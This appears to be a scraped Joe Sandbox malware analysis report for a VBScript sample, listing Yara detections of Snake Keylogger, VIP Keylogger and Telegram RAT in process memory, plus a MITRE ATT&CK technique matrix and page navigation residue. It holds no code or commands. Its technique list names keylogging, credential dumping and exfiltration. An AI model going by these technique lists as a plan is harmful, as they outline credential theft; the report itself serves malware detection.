Source: Yara match	File source: 0000000A.00000003.1840988876.000000001FFCD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3012481988.0000000024330000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2998810475.0000000030BC9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3011915133.000000001FF40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2996815062.000000001CE19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match	File source: 0000000A.00000002.3001487610.0000000021D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3001337682.00000000310F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3000201227.000000001D2A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 10.2.fptrsiaN.pif.242d0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1ce59d46.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.fptrsiaN.pif.1b2ec7f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.fptrsiaN.pif.1b2ec7f8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.33bf0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.21b5ac4e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1ce59d46.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1ff40000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1ce5ac4e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.21b59d46.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.30c0ac4e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.335a0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.33bf0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.335a0f08.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.24330000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.242d0f08.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1ff40000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.242d0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.fptrsiaN.pif.1ffcda28.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1f6e0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1f6e0f08.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.30c09d46.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.335a0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.24330000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.335a0f08.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.21b5ac4e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1f6e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.30c0ac4e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.242d0f08.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.fptrsiaN.pif.1ffcda28.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.21b59d46.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.fptrsiaN.pif.2f0fd950.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.30c09d46.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1ce5ac4e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.fptrsiaN.pif.2f0fd950.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3001487610.0000000021E45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1724265899.000000001B2EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3000473987.0000000021B19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.1916140937.000000002F0FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3012935219.0000000033BF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1840988876.000000001FFCD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3012481988.0000000024330000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2998810475.0000000030BC9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3011915133.000000001FF40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2996815062.000000001CE19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3000201227.000000001D36F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: fptrsiaN.pif PID: 5316, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fptrsiaN.pif PID: 1196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fptrsiaN.pif PID: 2836, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 10.2.fptrsiaN.pif.242d0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1ce59d46.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.fptrsiaN.pif.1b2ec7f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.fptrsiaN.pif.1b2ec7f8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.33bf0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.21b5ac4e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1ce59d46.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1ff40000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1ce5ac4e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.21b59d46.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.30c0ac4e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.335a0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.33bf0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.335a0f08.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.24330000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.242d0f08.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1ff40000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.242d0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.fptrsiaN.pif.1ffcda28.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1f6e0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1f6e0f08.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.30c09d46.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.335a0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.24330000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.335a0f08.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.21b5ac4e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1f6e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.30c0ac4e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.242d0f08.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.fptrsiaN.pif.1ffcda28.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.fptrsiaN.pif.21b59d46.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.fptrsiaN.pif.2f0fd950.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.fptrsiaN.pif.30c09d46.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.fptrsiaN.pif.1ce5ac4e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.fptrsiaN.pif.2f0fd950.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3000201227.000000001D40F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1724265899.000000001B2EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3000473987.0000000021B19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3001337682.00000000311F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3001487610.0000000021EEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.1916140937.000000002F0FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3012935219.0000000033BF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1840988876.000000001FFCD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3012481988.0000000024330000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2998810475.0000000030BC9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3011915133.000000001FF40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2996815062.000000001CE19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: fptrsiaN.pif PID: 5316, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fptrsiaN.pif PID: 1196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fptrsiaN.pif PID: 2836, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	121 Scripting	1 Valid Accounts	1 Native API	121 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Shared Modules	1 DLL Side-Loading	1 Valid Accounts	11 Deobfuscate/Decode Files or Information	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Exploitation for Client Execution	1 Valid Accounts	1 Access Token Manipulation	4 Obfuscated Files or Information	Security Account Manager	26 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Command and Scripting Interpreter	1 Registry Run Keys / Startup Folder	311 Process Injection	4 Software Packing	NTDS	1 Query Registry	Distributed Component Object Model	Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Registry Run Keys / Startup Folder	1 Timestomp	LSA Secrets	341 Security Software Discovery	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	41 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	24 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 File Deletion	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	231 Masquerading	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Valid Accounts	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Access Token Manipulation	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	41 Virtualization/Sandbox Evasion	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	311 Process Injection	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Draft doc PI ITS15235.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
Draft doc PI ITS15235.vbs